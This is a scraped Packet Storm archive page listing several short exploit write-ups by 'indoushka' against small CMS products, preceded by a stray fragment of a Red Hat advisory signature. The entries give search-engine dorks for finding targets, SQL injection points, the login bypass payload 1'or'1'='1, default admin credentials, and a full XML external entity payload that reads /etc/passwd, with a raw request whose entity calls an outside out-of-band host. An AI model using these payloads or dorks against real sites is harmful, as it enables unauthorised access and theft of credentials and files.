Of+baDW+ViLZLrriqcXlEN9aQ3Jvn3lPy1XYeSV5R0bPi+1c0htpUTczAdYCYmI8  
YpYo9h6evHLrex3dU8cI  
=pM/F  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4642-01

eLitius version 1.0 appears to leave backups in a world accessible directory under the document root.

**eLitius 1.0 Backup Disclosure**

Posted Aug 15, 2023

Authored by indoushka

eLitius version 1.0 appears to leave backups in a world accessible directory under the document root.

tags | exploit, root, info disclosure

SHA-256 | 37a6ad9ab40e37e23d7cbfe01ee9334c417b3339776c4691b7ae872e89ddb896

Download | Favorite | View

**eLitius 1.0 Backup Disclosure**

    ====================================================================================================================================| # Title     : eLitius v1.0 Backup Disclosure Vulnerability                                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit)                                               | | # Vendor    : https://elitius.com/download/eLitius_v_1_0.tar.gz                                                                  |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] appears to leave backups in a world accessible directory under the document root.[+] Use payload : /backup/[+] http://wingro/cmim/backup/Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,960)
*   Arbitrary (16,198)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,277)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,345)
*   DoS (23,432)
*   Encryption (2,370)
*   Exploit (51,887)
*   File Inclusion (4,222)
*   File Upload (973)
*   Firewall (821)
*   Info Disclosure (2,773)
*   Intrusion Detection (892)
*   Java (3,043)
*   JavaScript (858)
*   Kernel (6,674)
*   Local (14,452)
*   Magazine (586)
*   Overflow (12,691)
*   Perl (1,423)
*   PHP (5,146)
*   Proof of Concept (2,338)
*   Protocol (3,602)
*   Python (1,535)
*   Remote (30,773)
*   Root (3,582)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,640)
*   Security Tool (7,887)
*   Shell (3,181)
*   Shellcode (1,214)
*   Sniffer (894)
*   Spoof (2,206)
*   SQL Injection (16,372)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (664)
*   Vulnerability (31,775)
*   Web (9,664)
*   Whitepaper (3,749)
*   x86 (962)
*   XSS (17,938)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,815)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,457)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,727)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,816)
*   UNIX (9,290)
*   UnixWare (186)
*   Windows (6,573)
*   Other

eLitius 1.0 Backup Disclosure

Elite CMS Pro version 2.01 suffers from a remote SQL injection vulnerability.

    ======================================================================================================================================| # Title     : Elite CMS Pro V2.01 Sql injection Vulnerability                                                                      || # Author    : indoushka                                                                                                            || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                              || # Vendor    : http://elitecms.net/                                                                                                 |  | # Dork      : Powered by Elite CMS Pro - Version 2.01                                                                              |======================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine .[+] http://127.0.0.1/index.php?mpage=3&subpage=1%27 <=====| iinject here[+] Panel :http://127.0.0.1/admin/login.phpGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Elite CMS Pro 2.01 SQL Injection

Elevel CMS version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : Elevel CMS v1.0 authentication bypass vulnerability                                                                || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            || # Vendor    : http://www.elevel.it/                                                                                              |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] uSE pAYLOAD : user & pass : 1'or'1'='1[+] http://127.0.0.1/gruppimolleportoniit/login.phpGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Elevel CMS 1.0 SQL Injection

Ekushey Project Manager CRM version 3.1 appears to leave default credentials installed after installation.

    ====================================================================================================================================| # Title     : Ekushey Project Manager CRM V3.1 Insecure Settings Vulnerability                                                   || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit)                                             | | # Vendor    : http://creativeitem.com/                                                                                           |  | # Dork      : "Login | Ekushey Project Manager CRM"                                                                              |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] leave a default administrative account in place post installation.[+] User = admin@example.com & pass : 1234[+] http://127.0.0.1/Ekushey/index.php?admin/dashboardGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Ekushey Project Manager CRM 3.1 Insecure Settings

E-Journal Homoeo CMS version 2.0.3 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : E-Journal homoeo CMS v2.0.3 Sql inhection Vulnerability                                                            || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : http://prosoftsolution.in//                                                                                        |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : job_detail.php?job_id=[+] https://127.0.0.1/homoeoaddain/job_detail.php?job_id=214%27 <====| inject here[+] Pan3l :  /adminsys/Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

E-Journal Homoeo CMS 2.0.3 SQL Injection

EI Tube YouTube API version 3 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : EI Tube YouTube API V3 site builder Sql Injection Vulnerability                                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            | | # Vendor    : https://pomento.in/ei-tube-youtube-api-v3-site-builder/?v=fa3c7f2b5dae                                             |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /watch?page=%5c[+] https://127.0.0.1/ei-tubecom/watch?page=%5cGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

EI Tube YouTube API 3 SQL Injection

E-Fun CMS version 5.0 suffers from an XML external entity injection vulnerability.

====================================================================================================================================  
| # Title     : E-Fun CMS V5.0 XML external entity injection Vulnerability                                                         |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            |  
| # Vendor    : http://www.e-fun.com.tw/                                                                                           |  
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] Vulnerability description :

XML supports a facility known as "external entities",   
which instruct an XML processor to retrieve and perform   
an inline include of XML located at a particular URI.   
An external XML entity can be used to append or modify   
the document type declaration (DTD) associated with an   
XML document. An external XML entity can also be used   
to include XML within the content of an XML document. 

Now assume that the XML processor parses data originating   
from a source under attacker control. Most of the time   
the processor will not be validating, but it MAY include   
the replacement text thus initiating an unexpected file   
open operation, or HTTP transfer, or whatever system ids   
the XML processor knows how to access. 

below is a sample XML document that will use this functionality   
to include the contents of a local file (/etc/passwd)

target : http://127.0.0.1/landtopcomtw/webadmin/

<?xml version="1.0" encoding="utf-8"?>  
<!DOCTYPE indoushka [  
  <!ENTITY indoushka SYSTEM "file:///etc/passwd">  
]>  
<xxx>&indoushka;</xxx>

POST /webadmin/_chkpasswd.php HTTP/1.1  
Content-type: text/xml  
Host: landtop.com.tw  
Content-Length: 175  
Connection: Keep-alive  
Accept-Encoding: gzip,deflate  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21  
Accept: */*

<?xml version="1.0" encoding="utf-8"?>  
<!DOCTYPE dt5fqyt [  
  <!ENTITY dt5fqytent SYSTEM "http://hityjSWv9cxlI.bxss.me/">  
]>  
<_chkpasswd.php>&dt5fqytent;</_chkpasswd.php>

[+] Affected items :

/webadmin/   
/webadmin/_chkpasswd.php   
/webadmin/index.php 

[+] The impact of this vulnerability :

Attacks can include disclosing local files,   
which may contain sensitive data such as passwords   
or private user data, using file: schemes or relative   
paths in the system identifier. Since the attack occurs   
relative to the application processing the XML document,   
an attacker may use this trusted application to pivot   
to other internal systems, possibly disclosing   
other internal content via http(s) requests.

[+] How to fix this vulnerability :

If possible it's recommended to disable parsing of XML external entities.

Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |  
=======================================================================================================================================

Source

Packet Storm